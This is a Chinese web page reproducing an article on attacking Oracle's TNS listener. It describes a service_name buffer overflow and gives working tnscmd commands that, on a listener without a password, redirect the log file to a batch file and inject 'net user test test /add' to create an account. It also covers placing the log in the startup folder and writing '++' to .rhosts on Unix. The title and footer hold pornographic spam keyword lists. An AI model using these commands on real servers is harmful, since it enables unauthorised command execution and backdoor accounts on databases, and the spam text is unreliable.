亚洲精品久久久中文字幕-亚洲精品久久片久久-亚洲精品久久青草-亚洲精品久久婷婷爱久久婷婷-亚洲精品久久午夜香蕉

您的位置:首頁技術文章
文章詳情頁

針對Oracle的TNS listener攻擊方法整理

瀏覽:93日期:2023-11-23 12:34:44

首先,根據版本的不同,TNS listener可能較易受到多種類型的緩沖區溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在oracle 9i中,當客戶機請求某個過長的service_name時,很容易受到溢出攻擊。當listener為日志構建錯誤消息之后,service_name的值會被復制到某于棧結構的緩沖區內,從而引起溢出—覆蓋保存值將返回棧中的地址。這種做法可以使攻擊者獲得控制權。事實上,TNS listener曾經有過多次溢出和格式化字符串的漏洞。

其次,另一類攻擊和日志文件有關。只有當未給listener設置口令的時候,攻擊才會有效。

假設某個listener沒有設置口令,攻擊方法如下:

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:)))” 將日志目錄設置到C盤

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))” 將日志文件設置為test.bat

tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))”該命令把

dir >test.txt、net user test test /add命令寫入c:test.bat文件,由于雙豎線的作用(第一條命令執行失敗后,WINDOWS命令解釋器執行后面的命令)把錯誤的信息注釋掉, 從而可以執行我們提交的命令。

通過設置日志文件到不同的目錄,例如WINDOWS的啟動目錄,當服務器重啟將執行惡意用戶提交的特定代碼,從而對系統造成威脅。

運行于UNIX系統上的oracle也會受到同樣的威脅。其中一種方法就是將“++”回送給.rhost文件,當系統運行時,使用r*services命令。

標簽: Oracle 數據庫
主站蜘蛛池模板: 亚洲欧美日韩综合在线一区二区三区 | 亚洲精品一区91 | 视频一区二区国产无限在线观看 | 奇米成人网| 拍拍拍精品视频在线观看 | 国产欧美一区视频在线观看 | 日本国产一区 | 最新亚洲一区二区三区四区 | 国产日韩欧美在线观看 | 欧美黄色录像 | 国产午夜大片 | 97欧美在线看欧美视频免费 | 中文字幕欧美日韩一 | 香蕉视频最新网址 | a级情欲片在线观看免费女中文 | 亚洲欧美一区二区视频 | x8x8女性性爽免费视频 | 国产欧美日韩综合精品一区二区 | 在线看片视频 | 日本大片久久久高清免费看 | 亚洲精品乱码久久久久久蜜桃欧美 | 国产福利视频一区二区三区 | 66av99精品福利视频在线 | 亚洲一级高清在线中文字幕 | 精品国产福利一区二区在线 | 久久东京伊人一本到鬼色 | 国产午夜毛片一区二区三区 | 成人国产在线看不卡 | 色婷婷五 | 欧美伊人久久久久久久久影院 | 久久99精品久久久久子伦小说 | 久久激情综合网 | 性欧美一级毛片在线播放 | 成人国产mv免费视频 | 成年片人免费www | 色视频在线观看在线播放 | 欧美日韩亚洲国产千人斩 | 国产成+人+亚洲+欧美+日韩 | 国产在线麻豆精品观看 | 日本xxxxx黄区免费看动漫 | 欧洲性大片xxxxx久久久 |